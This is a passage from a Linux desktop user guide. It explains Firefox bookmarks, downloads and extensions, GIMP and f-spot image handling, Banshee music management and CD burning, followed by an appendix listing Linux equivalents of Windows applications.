9.3.1 Using the Bookmark Manager
The bookmark manager can be used to manage the properties (name and address location) for each bookmark and organize the bookmarks into folders and sections. See Figure 9-2 on page 127.
Figure 9-2 Using the Firefox Bookmark Manager
To open the bookmark manager, click Bookmarks > Manage Bookmarks. A window opens and displays your bookmarks. With New Folder, create a new folder with a name and a description. If you need a new bookmark, click New Bookmark. This lets you insert the name, location, keywords, and a description. The keyword is a shortcut to your bookmark. If you need your newly created bookmark in the sidebar, check Load this bookmark in the sidebar.
9.3.2 Importing Bookmarks from Other Browsers
If you used a different browser in the past, you probably want to use your preferences and bookmarks in Firefox, too. At the moment, you can import from Netscape 4.x, 6, 7, Mozilla 1.x, and Opera. To import your settings, click File > Import. Select the browser from which to import settings. After you click Next, your settings are imported. Find your imported bookmarks in a newly created folder, beginning with From.
9.3.3 Live Bookmarks
Live bookmarks display headlines in your bookmark menu and keep you up to date with the latest news. This enables you to save time with one glance at your favorite sites. Many sites and blogs support this format. A Web site indicates this by showing an orange icon in the right part of the location bar. Click it and choose Add NAME OF THE FEED as Live Bookmark. A dialog box opens where you can select the name and location of your live bookmark. Confirm with Add. Some sites do not tell Firefox that they support a news feed, although they actually do. To add a live bookmark manually, you need the URL of the feed. Do the following:

Adding a Live Bookmark Manually

1 Open the bookmark manager with Bookmarks > Manage Bookmarks. A new window opens.
2 Select File > New Live Bookmark. A dialog box opens.
3 Insert a name for the live bookmark and add your URL, for example, http://. Firefox updates your live bookmarks.
4 Close your bookmark manager.
9.4 Using the Download Manager
With the help of the download manager, keep track of your current and past downloads. To open the download manager, click Tools > Downloads. Firefox opens a window with your downloads. While downloading a file, see a progress bar and the current file. If necessary, pause a download and resume it later. To open a downloaded file, click Open. With Remove, remove it from the list. If you need information about the file, right-click the filename and choose Properties. If you need further control of the download manager, open the configuration window from Edit > Preferences and go to the Downloads tab. Here, determine the download folder, how the manager behaves, and some configuration of file types.
9.5 Customizing Firefox
Firefox can be customized extensively. You can install extensions, change themes, and add smart keywords for your online searches.
9.5.1 Extensions
Mozilla Firefox is a multifunctional application, which means that you can download and install add-ons, known as extensions. For example, add a new download manager or mouse gestures. This has the advantage that Firefox itself stays small and unbloated. To add an extension, click Tools > Extensions. In the bottom-right corner, click Get More Extensions to open the Mozilla extensions update Web page where you can choose from a variety of available extensions. Click the extension to install, then click the install link to download and install it. When you restart Firefox, the new extension is functional. You can also browse the various extensions at addons.mozilla.org.
Figure 9-3 Installing Firefox Extensions
9.5.2 Changing Themes
If you do not like the standard look and feel of Firefox, install a new theme. Themes do not change the functionality, only the appearance of the browser. When installing a theme, Firefox asks for confirmation first. Allow the installation or cancel it. After a successful installation, you can enable the new theme. 1 Click Tools > Themes.
2 In the new dialog that appears, click Get More Themes. If you have already installed a theme, find it in the list, as in Figure 9-4 on page 130.
Figure 9-4 Installing Firefox Themes
3 A new window appears with the Web site addons.mozilla.org.
4 Choose a theme and click Install Now.
5 Confirm the download and installation.
6 After downloading the theme, a dialog appears and informs you about your list of themes. Activate the new theme with Use Theme.
7 Close the window and restart Firefox.

If a theme is installed, you can always switch to a different theme without restarting by clicking Tools > Themes then Use Theme. If you do not use a theme anymore, you can delete it in the same dialog with Uninstall.
9.5.3 Adding Smart Keywords to Your Online Searches
Searching the Internet is one of the main tasks a browser can perform for you. Firefox lets you define your own smart keywords: abbreviations to use as a “command” for searching the Web. For example, if you use Wikipedia often, use a smart keyword to simplify this task:

1 Go to Wikipedia.
2 After Firefox displays the Web page, locate the search text field. Right-click it, then choose Add a Keyword for this Search from the menu that opens.
3 The Add Bookmark dialog appears. In Name, name this Web page, for example, Wikipedia (en).
4 For Keyword, enter your abbreviation of this Web page, for example, wiki.
5 With Create in, choose the location of the entry in your bookmarks section. You can put it into Quick Searches, but any other level is also appropriate.
6 Finalize with Add.

You have successfully generated a new keyword. Whenever you need to look into Wikipedia, you do not have to use the entire URL. Just type wiki Linux to view an entry about Linux.
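Under the hood, the smart keyword created above is stored as an ordinary bookmark whose Location contains a %s placeholder; Firefox substitutes your search terms for %s when you use the keyword. The resulting entry looks roughly like this (the exact Wikipedia search URL shown here is illustrative, not taken from this guide):

```
Name:     Wikipedia (en)
Location: http://en.wikipedia.org/wiki/Special:Search?search=%s
Keyword:  wiki
```

Typing wiki Linux in the location bar then loads this URL with Linux substituted for %s.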
9.6 Printing from Firefox
Configure the way Firefox prints the content it displays using the Page Setup dialog. Click File > Page Setup, then go to the Format & Options tab to select the orientation of your print jobs. You can scale the output or have it adjust automatically. To print a background, select Print Background (colors & images). Click the Margins & Header/Footer tab to adjust margins and select what to include in the headers and footers. After you have configured your settings, print a Web page with File > Print. Select the printer or a file in which to save the output. With Properties, set the paper size, specify the print command, choose grayscale or color, and determine the margins. When satisfied with your settings, approve with Print.
9.7 For More Information
Get more information about Firefox from the official home page. Refer to the integrated help to find out more about certain options or features.
IV Multimedia
10 Manipulating Graphics with The GIMP
See “For More Information” on page 139 for ideas of where to find more information about the program.
10.1 Graphics Formats
There are two main formats for graphics—pixel and vector. The GIMP works only with pixel graphics, which is the normal format for photographs and scanned images. Pixel graphics consist of small blocks of color that together create the entire image. The files can easily become quite large because of this. It is also not possible to increase the size of a pixel image without losing quality. Unlike pixel graphics, vector graphics do not store information for all individual pixels. Instead, they store information about how image points, lines, or areas are grouped together. Vector images can also be scaled very easily. The drawing application of OpenOffice.org, for example, uses this format.
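As a rough illustration of why pixel graphics files get large, an uncompressed RGB image stores three bytes per pixel, so the raw size grows with the pixel count. A quick shell calculation (the 1800x1200 dimensions are just an example):

```shell
# Approximate uncompressed size of an RGB pixel image (3 bytes per pixel).
width=1800
height=1200
bytes=$((width * height * 3))
echo "${bytes} bytes, about $((bytes / 1024 / 1024)) MiB"
```

Compression in formats such as PNG or JPG reduces this considerably, which is why the on-disk size depends heavily on the chosen format.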
10.2 Starting GIMP
Start GIMP from the main menu. Alternatively, enter gimp & in a command line.
10.2.1 Initial Configuration
When starting GIMP for the first time, a configuration wizard opens for preparatory configuration. The default settings are acceptable for most purposes. Press Continue in each dialog unless you are familiar with the settings and prefer another setup.
10.2.2 The Default Windows
Three windows appear by default. They can be arranged on the screen and, except the toolbox, closed if no longer needed. Closing the toolbox closes the application. In the default configuration, GIMP saves your window layout when you exit. Dialogs left open reappear when you next start the program.
The Toolbox

The main window of GIMP, shown in “The Main Window” on page 136, contains the main controls of the application. Closing it exits the application. At the very top, the menu bar offers access to file functions, extensions, and help. Below that, find icons for the various tools. Hover the mouse over an icon to display information about it.
Figure 10-1 The Main Window
The current foreground and background color are shown in two overlapping boxes. The default colors are black for the foreground and white for the background. Click the box to open a color selection dialog. Swap the foreground and background color with the bent arrow symbol to the upper right of the boxes. Use the black and white symbol to the lower left to reset the colors to the default. To the right, the current brush, pattern, and gradient are shown. Click the displayed one to access the selection dialog. The lower portion of the window allows configuration of various options for the current tool.

Layers, Channels, Paths, Undo

In the first section, use the drop-down box to select the image to which the tabs refer. By clicking Auto, control whether the active image is chosen automatically. By default, Auto is enabled. Layers shows the different layers in the current image and can be used to manipulate the layers. Channels shows and can manipulate the color channels of the image. Paths are a vector-based method of selecting parts of an image. They can also be used for drawing. Paths shows the paths available for an image and provides access to path functions. Undo shows a limited history of modifications made to the current image.
10.3 Getting Started in GIMP
Although GIMP can be a bit overwhelming for new users, most quickly find it easy to use once they work out a few basics. Crucial basic functions are creating, opening, and saving images.
10.3.1 Creating a New Image
To create a new image, select File > New or press Ctrl+N. This opens a dialog in which to make settings for the new image. If desired, select a predefined setting called a Template. To create a custom template, select File > Dialogs > Templates and use the controls offered by the window that opens. In the Image Size section, set the size of the image to create in pixels or another unit. Click the unit to select another unit from the list of available units. The ratio between pixels and a unit is set in
Resolution, which appears when the Advanced Options section is open. A resolution of 72 pixels per inch corresponds to screen display. It is sufficient for Web page graphics. A higher resolution should be used for images to print. For most printers, a resolution of 300 pixels per inch results in an acceptable quality. In Colorspace, select whether the image should be in color (RGB) or Grayscale. Select the Fill Type for the new image. Foreground Color and Background Color use the colors selected in the toolbox. White uses a white background in the image. Transparent creates a clear image. Transparency is represented by a gray checkerboard pattern. Enter a comment for the new image in Comment. When the settings meet your needs, press OK. To restore the default settings, click Reset. Clicking Cancel aborts creation of a new image.
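Following the 300 pixels per inch guideline above, the pixel dimensions needed for a given print size are simply the size in inches times the resolution. For example, for a hypothetical 6x4 inch print (shell arithmetic):

```shell
# Pixel dimensions required for a 6x4 inch print at 300 ppi.
ppi=300
width_px=$((6 * ppi))
height_px=$((4 * ppi))
echo "${width_px}x${height_px}"
```

Enter these values in the Image Size section when creating the new image.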
10.3.2 Opening an Existing Image
To open an existing image, select File > Open or press Ctrl+O. In the dialog that opens, select the desired file. You can also press Ctrl+L and type the URI of the desired image directly. Then click OK to open the selected image or press Cancel to skip opening an image.
10.3.3 Scanning an Image
Instead of opening an existing image or creating a new one, you can scan one. To scan directly from the GIMP, make sure that the package xsane is installed. To open the scanning dialog, select File > Acquire > XSane: scanning device. Create a preview when the object to scan is smaller than the total scanning area. Press Acquire preview in the Preview dialog to create a preview. If you want to scan only part of the area, select the desired rectangular part with the mouse. In the xsane dialog, select whether to scan a grayscale or color image and the required scan resolution. The higher the resolution, the better the quality of the scanned image is. However, this also results in a correspondingly larger file and the scanning process can take a very long time at higher resolutions. The size of the final image (both in pixels and bytes) is shown in the lower part of the dialog. In the xsane dialog, use the sliders to set desired gamma, brightness, and contrast values. Changes are visible in the preview immediately. Once all settings have been made, click Scan to scan the image.
10.3.4 The Image Window
The new, opened, or scanned image appears in its own window. The menu bar at the top of the window provides access to all image functions. Alternatively, access the menu by right-clicking the image or clicking the small arrow button in the left corner of the rulers. File offers the standard file options, such as Save and Print. Close closes the current image. Quit closes the entire application. With the items in the View menu, control the display of the image and the image window. New View opens a second display window of the current image. Changes made in one view are reflected in all other views of that image. Alternate views are useful for magnifying a part of an image for manipulation while seeing the complete image in another view. Adjust the magnification level of the
current window with Zoom. When Shrink Wrap is selected, the image window is resized to fit the current image display exactly.
10.4 Saving Images
No image function is as important as File > Save. It is better to save too often than too rarely. Use File > Save as to save the image with a new filename. It is a good idea to save image stages under different names or make backups in another directory so you can easily restore a previous state. When saving for the first time or using Save as, a dialog opens in which to specify the filename and type. Enter the filename in the field at the top. For Save in folder, select the directory in which to save the file from a list of commonly used directories. To use a different directory or create a new one, open Browse for other folders. It is recommended to leave Select File Type set to By Extension. With that setting, GIMP determines the file type based on the extension appended to the filename. The following file types are frequently useful:

XCF
This is the native format of the application. It saves all layer and path information along with the image itself. Even if you need an image in another format, it is usually a good idea to save a copy as XCF to simplify future modifications.

PAT
This is the format used for GIMP patterns. Saving an image in this format enables using the image as a fill pattern in GIMP.

JPG
JPG or JPEG is a common format for photographs and Web page graphics without transparency. Its compression method enables reduction of file sizes, but information is lost when compressing. It may be a good idea to use the preview option when adjusting the compression level. Levels of 85% to 75% often result in an acceptable image quality with reasonable compression. Saving a backup in a lossless format, like XCF, is also recommended. If editing an image, save only the finished image as JPG. Repeatedly loading a JPG then saving can quickly result in poor image quality.

GIF
Although very popular in the past for graphics with transparency, GIF is less often used now because of license issues. GIF is also used for animated images. The format can only save indexed images. The file size can often be quite small if only a few colors are used.

PNG
With its support for transparency, lossless compression, free availability, and increasing browser support, PNG is replacing GIF as the preferred format for Web graphics with transparency. An added advantage is that PNG offers partial transparency, which is not offered by GIF. This enables smoother transitions from colored areas to transparent areas (antialiasing).

To save the image in the chosen format, press Save. To abort, press Cancel. If the image has features that cannot be saved in the chosen format, a dialog appears with choices for resolving the situation. Choosing Export, if offered, normally gives the desired results. A window then opens with the options of the format. Reasonable default values are provided.
10.5 Printing Images
To print an image, select File > Print from the image menu. If your printer is configured in the system, it should appear in the list. In some cases, it may be necessary to select an appropriate driver with Setup Printer. Select the appropriate paper size with Media Size and the type in Media Type. Other settings are available in the Image / Output Settings tab.
Figure 10-2 The Print Dialog
In the bottom portion of the window, adjust the image size. Press Use Original Image Size to take these settings from the image itself. This is recommended if you set an appropriate print size and resolution in the image. Adjust the image's position on the page with the fields in Position or by dragging the image in Preview. When satisfied with the settings, press Print. To save the settings for future use, instead use Print and Save Settings. Cancel aborts printing.
10.6 For More Information
The following resources are useful for a GIMP user, even if some of them apply to older versions.

• Help provides access to the internal help system. This documentation is also available in HTML and PDF formats at gimp.org.
• The GIMP User Group offers an informative Web site at sunsite.dk.
• gimp.org is the official home page of The GIMP.
• Grokking the GIMP by Carey Bunks is an excellent book based on an older GIMP version. Although some aspects of the program have changed, it can provide excellent guidance for image manipulation. An online version is available at gimp-savvy.com.
11 Using Digital Cameras with Linux
f-spot's toolbar offers the following modes:

Rotate
Use this shortcut to change an image's orientation.

Browse
The Browse mode allows you to view and search your entire collection or tagged subsets of it. You can also use the time line to search images by creation date.

Edit Image
This mode allows you to select one image and do some basic image processing. Details are available in Section 11.6, “Basic Image Processing with f-spot,” on page 146.

Fullscreen
Switch to fullscreen display mode.

Slideshow
Start a slide show.
11.1 Downloading Pictures from Your Camera
Import new images from your digital camera connected to the USB port of your computer using File > Import from Camera. The type of camera is detected automatically.
Figure 11-3 Import from Camera
f-spot launches a preview window displaying all the images that are available for download from the camera. The files are copied to the target directory specified via Copy Files to. If Import files after copy is selected, all images copied from the camera are automatically imported to f-spot's database. Tagging can be done on import if you select the appropriate tag with Select Tags. If you do not want to import all images on your camera to your database, just deselect the unwanted ones in the preview window.
11.2 Getting Information
Once you select an image, some basic statistical information about it is displayed in the lower left part of the window. This includes the filename, its version (copy or original image), the date of creation, its size, and the exposure used in creating this particular image. View the EXIF data associated with the image file with View > EXIF Data.
11.3 Managing Tags
Use tags to categorize any of your images to create manageable subsets of your collection. If, for example, you would like to get some sort of order into your collection of portrait shots of your loved ones, proceed like this:

1 Select the Browse mode of f-spot.
2 In the left frame of the f-spot window, select the People category, right-click it, then choose Create New Tag. The new tags then appear as subcategories below the People category:
  2a Create a new tag called Friends.
  2b Create a new tag called Family.
3 Now attach tags to images or groups of selected images. Right-click an image, choose Attach Tag, and select the appropriate tag for this image. To attach a tag to a group of images, click the first one, then press Shift and select the other ones without releasing the Shift key. Right-click for the tag menu and select the matching category.

After the images have been categorized, you can browse your collection by tag. Just check People > Family and the displayed collection is limited to the images tagged Family. Searching your collection by tag is also possible through Find > Find by Tag. The result of your search is displayed in the thumbnail overview window. Removing tags from single images or groups of images works similarly to attaching them. The tag editing functions are also accessible via the Tags menu in the top menu bar.
11.4 Search and Find
As mentioned in Section 11.3, “Managing Tags,” on page 144, tags can be used as a means to find certain images. Another way, which is quite unique to f-spot, is to use the Timeline below the toolbar. By dragging the little frame along this time line, limit the images displayed in the thumbnail overview to those taken in the selected time frame. f-spot starts with a sensibly chosen default time line, but you can always edit the time span by moving the sliders to the right and left ends of the time line.
11.5 Exporting Image Collections
f-spot offers a range of different export functions for your collections under File > Export. Probably the most often used of these are Export to Web Gallery and Export to CD. To export a selection of images to a Web gallery, proceed as follows:

1 Select the images to export.
2 Click File > Export > Export to Web Gallery and select a gallery to which to export your images or add a new one. f-spot establishes a connection to the Web location entered for your Web gallery. Select the album to which to export the images and decide whether to scale the images automatically and export titles and comments.
Figure 11-4 Exporting Images to a Web Gallery
To export a selection of images to CD, proceed as follows:

1 Select the images to export.
2 Click File > Export > Export to CD and click OK. f-spot copies the files and opens the CD writing dialog. Assign a name to your image disk and determine the writing speed. Click Write to start the CD writing process.
Figure 11-5 Exporting Images to a CD
11.6 Basic Image Processing with f-spot
f-spot offers several very basic image editing functionalities. Enter the edit mode of f-spot by clicking the Edit Image icon in the toolbar or by double-clicking the image to edit. Switch images using the arrow keys at the bottom right. Choose from the following edit functions:
Table 11-2 f-spot Edit Functions
Sharpen
Access this function with Edit > Sharpen. Adjust the values for Amount, Radius, and Threshold to your needs and click OK.

Crop Image
To crop the image to a selection you made, either choose a fixed ratio crop or the No Constraint option from the drop-down menu at the bottom left, select the region to crop, and click the scissor icon next to the ratio menu.

Red Eye Reduction
In a portrait shot, select the eye region of the face and click the red eye icon.

Adjust Color
View the histogram used in the creation of the shot and correct exposure and color temperature if necessary.
TIP: Professional image editing can be done with the GIMP. More information about The GIMP can be found in Chapter 10, “Manipulating Graphics with The GIMP,” on page 135.
12 Playing and Managing Your Music with Helix Banshee
12.1 Managing Your Library
You can use the library to do a variety of things, including playing, organizing, and importing music. You can also view a variety of information about your music collection, including playback statistics (when a song was last played and how many times).
12.1.1 Playing Your Music
To play a song, simply select the song in the library and click the Play button. Use the buttons in the upper left corner to pause a song or play the next or previous song. Use the volume control to adjust the volume. You can also use the items on the Playback menu to repeat or shuffle songs. Helix Banshee also has an integrated CD player. When you insert a music CD, your CD title appears in the left panel. Select the title and click the Play button to play your full CD.
12.1.2 Organizing Your Music
To create a new playlist, click Music > New Playlist (or press Ctrl+N). A new playlist is displayed in the left panel. Double-click New Playlist and enter the name you want. You can drag and drop songs from one playlist to another, or use the options on the Edit menu to remove or delete songs and rename or delete playlists. You can edit the name of the artist, album, and title, as well as the track number and track count. Simply select a song, then click Edit > Edit Song Metadata. If you want to set all fields in a set of songs to the same value, select multiple songs in a playlist, then click Edit > Edit Song Metadata.
Figure 12-3 Editing Song Dialog Box
12.1.3 Importing Music
Helix Banshee can import music from a file, folder, or CD. Click Music > Import Music, choose an import source, then click Import Music Source. To rip music from a CD to your music collection, click the Rip button near the top right.
12.2 Using Helix Banshee with Your iPod
To play music from your iPod, simply plug your iPod into your system. Your iPod appears in the left panel. Select the song you want to hear, then click the Play button.
Figure 12-4 iPod List in Helix Banshee
When the iPod is selected in the left panel, information about your iPod is displayed at the bottom left, including disk usage and Sync, Properties, and Eject buttons.
Figure 12-5 iPod Buttons in Helix Banshee
There are three ways to manage the music on your iPod:

• Manually: Browse your iPod and drag music between your library and the iPod.
• Automatically sync: Automatically copies everything in your library to the iPod.
• Automatic merge: All the music on your iPod that is not in your library is downloaded to your library, and all the music that is in your library and not on your iPod is uploaded to your iPod.
Use the iPod Properties dialog to rename and reclaim your iPod, and view vital statistics.
Figure 12-6 Helix Banshee iPod Properties
12.3 Creating Audio and MP3 CDs
To create audio and MP3 CDs, select the songs you want, then click the Write CD button in the upper right side of Helix Banshee.
12.4 Configuring Preferences
You can configure Helix Banshee preferences by clicking Edit > Preferences. The Preferences dialog contains the following tabs:

Library
Lets you specify a music folder location. This location is used when you import music. Click Copy files to Helix Banshee Music Folder when importing to Library to place a copy of the files you import in your Helix Banshee music folder.

Encoding
Lets you determine encoding profiles for CD ripping and iPod transcoding.

Burning
Lets you specify CD burning options. You can choose a disk drive, write speed, and disk format (Audio CD, MP3 CD, or Data CD). You can also configure advanced options, such as ejecting the CD when finished.

Advanced
Lets you choose from either the Helix Remote or the GStreamer engine for audio playback in Helix Banshee.
13 Burning CDs and DVDs
GNOME uses the Nautilus file manager to burn CDs and DVDs. To burn a CD or DVD:

1 Click Computer > More Applications > Audio & Video > GNOME CD/DVD Creator or insert a blank disc and click Create Data CD.
2 Copy the files you want to put on the CD into the Nautilus CD/DVD Creator window.
3 Click Write to Disc.
V Appendixes
A Getting to Know Linux Software
A.1 Office
This section features the most popular and powerful Linux office and business software solutions. These include office suites, databases, accounting software, and project management software.
Table A-1 Office Software for Windows and Linux

Office Suite
  Windows: MS Office, StarOffice, OpenOffice.org
  Linux: OpenOffice.org, StarOffice, KOffice

Word Processor
  Windows: MS Word, StarOffice/OpenOffice.org Writer, WordPerfect
  Linux: OpenOffice.org/StarOffice Writer, KWord

Spreadsheet
  Windows: MS Excel, StarOffice/OpenOffice.org Calc
  Linux: OpenOffice.org/StarOffice Calc, Gnumeric, KSpread

Presentation
  Windows: MS PowerPoint, StarOffice/OpenOffice.org Impress
  Linux: OpenOffice.org/StarOffice Impress, KPresenter

Data Plotting
  Windows: MS Excel, MicroCall Origin
  Linux: OpenOffice.org Calc, Kst, Gnuplot, Grace (Xmgr), LabPlot

Local Database
  Windows: MS Access, OpenOffice.org Base
  Linux: OpenOffice.org Base, Rekall, kexi, Mergeant, PostgreSQL

Financial Accounting
  Windows: MS Money, Quicken, moneyplex
  Linux: GnuCash, moneyplex, KMyMoney

Project Management
  Windows: MS Project
  Linux: Planner, Taskjuggler

Mind Mapping
  Windows: MindManager, FreeMind
  Linux: VYM (View Your Mind), FreeMind, KDissert
FreeMind
FreeMind helps you to visualize your thoughts by creating and editing a mind map. You can easily copy nodes or the style of nodes and paste text from sources such as HTML, RTF, and mails. The mind maps can be exported to various formats, such as HTML and XML. For more information, refer to the FreeMind wiki (wiki/index.php/Main_Page).

GnuCash
GnuCash is a software tool to control both your personal and business finances. Keep track of income and expenses and manage your bank accounts and stock portfolios, all using one piece of software. Learn more about GnuCash on the project's Web site.

Gnumeric
Gnumeric is a spreadsheet solution for the GNOME desktop environment. Find more information about Gnumeric on the project's Web site.

Gnuplot
Gnuplot is a very powerful and portable command line–controlled data plotting software. It is also available for MacOS and Windows platforms. Plots created by Gnuplot can be exported to various formats, such as PostScript, PDF, and SVG, allowing you to process these plots easily. Find more information about Gnuplot on the project's Web site.

Grace
Grace is a very mature 2D plotting tool for almost all flavors of Unix, including Linux. Create and edit plots with a graphical user interface. Grace supports an unlimited number of graphs per plot. Its export formats include JPEG, PNG, SVG, PDF, PS, and EPS. Find more information at plasma-gate.weizmann.ac.il/Grace/.

Kdissert
Kdissert is an application for structuring ideas and concepts, mostly aimed at students but also helpful for teachers, decision makers, engineers, and businessmen. Ideas are first laid down on a canvas, then associated into a tree. You can generate various outputs from the mind map, such as PDF files, text documents (also for OpenOffice.org Writer), and HTML files. Find more information on the project's Web site.

KMyMoney
KMyMoney is a personal finance manager for KDE. It enables users of open source operating systems to keep track of their personal finances by providing a broad array of financial features and tools. Learn more about KMyMoney at kmymoney2.sourceforge.net.

KOffice
KOffice is an integrated office suite for the KDE desktop. It comes with various modules like word processing (KWord), spreadsheets (KSpread), presentations (KPresenter), several image processing applications (Kivio, Karbon14, Krita), a database front-end (Kexi), and many more. Find more information about KOffice on the project's Web site.

Kst
Kst is a KDE application for real-time data viewing and plotting with basic data analysis functionality. Kst contains many powerful built-in features, such as robust plotting of live streaming data, and is expandable with plug-ins and extensions. Find more about Kst at kst.kde.org.

LabPlot
LabPlot is a program for creating and managing two- or three-dimensional data plots. Graphs can be produced both from data and from functions, and one plot can include multiple graphs. It also offers various data analysis methods. Find more information about LabPlot at labplot.sourceforge.net.

Mergeant
Mergeant is a database front-end for the GNOME desktop. Find more information on the project's Web site.

moneyplex
moneyplex is a tool to control your finances. All tasks, from managing incoming resources and expenses and monitoring your stock portfolio to online transactions via the HBCI standard, are handled by moneyplex. Keep track of your financial transactions over time using various analysis options. Because this tool is also available for Windows, users can migrate very easily without having to learn a whole new application interface. Find more information about moneyplex on the project's Web site.

OpenOffice.org
OpenOffice.org is the open source equivalent of MS Office. It is a very powerful office suite including a word processor (Writer), a spreadsheet (Calc), a database manager (Base), a presentation manager (Impress), a drawing program (Draw), and a formula editor for generating mathematical equations and formulas (Math). Users familiar with the MS Office family of applications find a very similar application interface and all the functionality to which they are accustomed. Because OpenOffice.org is capable of importing data from MS Office applications, the transition from one office suite to the other is very smooth. A Windows version of OpenOffice.org even exists, enabling Windows users to switch to an open source alternative while still using Windows. Find more information about OpenOffice.org on the project's Web site, and read our OpenOffice.org chapter for a short introduction to the office suite.
Planner
Planner is a project management tool for the GNOME desktop, aiming to provide functionality similar to the project management tools used under Windows. Among its various features are Gantt charting abilities and different kinds of views of tasks and resources. Find more information about Planner on the project's Web site (projects/planner/).

PostgreSQL
PostgreSQL is an object-relational database management system that supports an extended subset of the SQL standard, including transactions, foreign keys, subqueries, triggers, and user-defined types and functions. Find more information about PostgreSQL on the project's Web site.

Rekall
Rekall is a tool for manipulating databases. Supported databases include MySQL, PostgreSQL, XBase with XBSQL, IBM DB2, and ODBC. Use Rekall to generate different sorts of reports and forms, design database queries, or import and export data to various formats. Find more information about Rekall on the project's Web site.

StarOffice
StarOffice is a proprietary version of OpenOffice.org and is distributed by Sun Microsystems. It is available on multiple platforms, including Windows and Solaris. It includes certain advanced features not available with the free version (OpenOffice.org). Find more information about StarOffice on Sun's Web site (staroffice/).

Taskjuggler
Taskjuggler is a lean but very powerful project management software. Take control of your projects using the Gantt charting features or by generating all kinds of reports (in XML, HTML, or CSV format). Users who are not comfortable with controlling applications from the command line can use a graphical front-end to Taskjuggler. Find more information about Taskjuggler on the project's Web site.

VYM (View Your Mind)
VYM is software for visualizing your thoughts by creating and manipulating mind maps. Most manipulations do not require more than one mouse click. Branches can be inserted, deleted, and reordered very easily. VYM also offers a set of flags allowing you to mark certain parts of the map (important, time critical, etc.). Links, notes, and images can be added to a mind map as well. VYM mind maps use an XML format, allowing you to export your mind maps to HTML easily. Find more information about VYM on the project's Web site.
A.2 Network
The following section features various Linux applications for networking purposes. Get to know the most popular Linux browsers and e-mail and chat clients.
Table A-2 Network Software for Windows and Linux

Task | Windows Application | Linux Application
Web Browser | Internet Explorer, Firefox, Opera | Konqueror, Firefox, Opera, Epiphany
E-Mail Client/Personal Information Management | MS Outlook, Lotus Notes, Mozilla Thunderbird | Evolution, Kontact, Mozilla Thunderbird
Instant Messaging/IRC Clients | MSN, AIM, Yahoo Messenger, XChat, Gaim | Gaim, Kopete, Konversation, XChat
Conferencing (Video and Audio) | NetMeeting | GnomeMeeting/Ekiga
Voice over IP | X-Lite | Linphone, Skype
FTP Clients | leechftp, wsftp | gftp, kbear
Epiphany
Epiphany is a lean but powerful Web browser for the GNOME desktop. Many of its features and extensions resemble Firefox. Find more information about Epiphany at projects/epiphany.

Evolution
Evolution is personal information management software for the GNOME desktop, combining mail, calendar, and address book functionality. It offers advanced e-mail filter and search options, provides sync functionality for Palm devices, and allows you to run Evolution as an Exchange or GroupWise client to integrate better into heterogeneous environments. Find more information about Evolution on the project's Web site (projects/evolution/).

Firefox
Firefox is the youngest member of the Mozilla browser family. It runs on various platforms, including Linux, MacOS, and Windows. Its main features include built-in customizable searches, pop-up blocking, RSS news feeds, password management, tabbed browsing, and some advanced security and privacy options. Firefox is very flexible, allowing you to customize almost anything you want (searches, toolbars, skins, buttons, etc.). Neat add-ons and extensions can be downloaded from the Firefox Web site. Find more information on the Firefox Web site. You can also read our Firefox chapter.

Gaim
Gaim is a smart instant messenger program supporting multiple protocols, such as AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, Jabber, SILC, and GroupWise Messenger. It is possible to log in to different accounts on different IM networks and chat on different channels simultaneously. Gaim also exists in a Windows version. Find more information about Gaim at gaim.sourceforge.net.

gftp
gftp is an FTP client using the GTK toolkit. Its features include simultaneous downloads, resume of interrupted file transfers, file transfer queues, download of entire directories, FTP proxy support, remote directory caching, passive and nonpassive file transfers, and drag and drop support. Find more information on the project's Web site.

GnomeMeeting/Ekiga
GnomeMeeting (recently renamed Ekiga) is the open source equivalent of Microsoft's NetMeeting. It features LDAP and ILS support for address lookup and integrates with Evolution to share the address data stored there. GnomeMeeting/Ekiga supports PC-to-phone calls, allowing you to call another party with just your computer, sound card, and microphone, without any additional hardware. Find more information about GnomeMeeting/Ekiga on the project's Web site.

kbear
KBear is a KDE FTP client with the ability to have concurrent connections to multiple hosts, three separate view modes, support for multiple protocols (like FTP and SFTP), a site manager plug-in, firewall support, logging capabilities, and much more. Find more information at sourceforge.net/projects/kbear.

Konqueror
Konqueror is a multitalented application created by the KDE developers. It acts as file manager and document viewer, but is also a very powerful and highly customizable Web browser. It supports the current Web standards, such as CSS(2), Java applets, JavaScript and Netscape plug-ins (Flash and RealVideo), DOM, and SSL. It offers neat helpers like an integrated search bar and supports tabbed browsing. Bookmarks can be imported from various other Web browsers, like Internet Explorer, Mozilla, and Opera. Find more information about Konqueror on the project's Web site. You can also read our chapter about Konqueror as a Web browser in the KDE User Guide.

Kontact
Kontact is the KDE personal information management suite. It includes e-mail, calendar, address book, and Palm sync functionalities. Like Evolution, it can act as an Exchange or GroupWise client. Kontact combines several stand-alone KDE applications (KMail, KAddressbook, KOrganizer, and KPilot) to form an entity providing all the PIM functionality you need. Find more information about Kontact on the project's Web site. You can also read our Kontact chapter in the KDE User Guide.

Konversation
Konversation is an easy-to-use IRC client for KDE. Its features include support for SSL connections, strikeout, multichannel joins, away and unaway messages, ignore list functionality, Unicode, autoconnect to a server, optional time stamps in chat windows, and configurable background colors. Find more information about Konversation at konversation.kde.org.

Kopete
Kopete is a very intuitive and easy-to-use instant messenger tool supporting protocols including IRC, ICQ, AIM, GroupWise Messenger, Yahoo, MSN, Gadu-Gadu, Lotus Sametime, SMS messages, and Jabber. Find more information about Kopete at kopete.kde.org.

Linphone
Linphone is a smart and lean Voice over IP client using the SIP protocol to establish calls. Find more information on the project's Web site. You can also read our Linphone chapter.

Mozilla Thunderbird
Thunderbird is an e-mail client application that comes as part of the Mozilla suite. It is also available for Microsoft Windows and MacOS, which facilitates the transition from one of these operating systems to Linux. Find more information about Mozilla Thunderbird on the project's Web site.

Opera
Opera is a powerful Web browser with neat add-ons like an optional e-mail client and a chat module. Opera offers pop-up blocking, RSS feeds, built-in and customizable searches, a password manager, and tabbed browsing. The main functionalities are easily reached through their respective panels. Because this tool is also available for Windows, it allows a much easier transition to Linux for those who have been using it under Windows. Find more information about Opera on the project's Web site.

Skype
Skype is an application for several platforms (Linux, Windows, Mac OS X) that can be used for phone calls over the Internet with good sound quality and end-to-end encryption. When using Skype, configuring the firewall or router is not necessary. For more information, refer to the Skype Web site.

XChat
XChat is an IRC client that runs on most Linux and UNIX platforms as well as under Windows and MacOS X. Find more information about XChat on the project's Web site.
A.3 Multimedia
The following section introduces the most popular multimedia applications for Linux. Get to know media players, sound editing solutions, and video editing tools.
Table A-3 Multimedia Software for Windows and Linux

Task | Windows Application | Linux Application
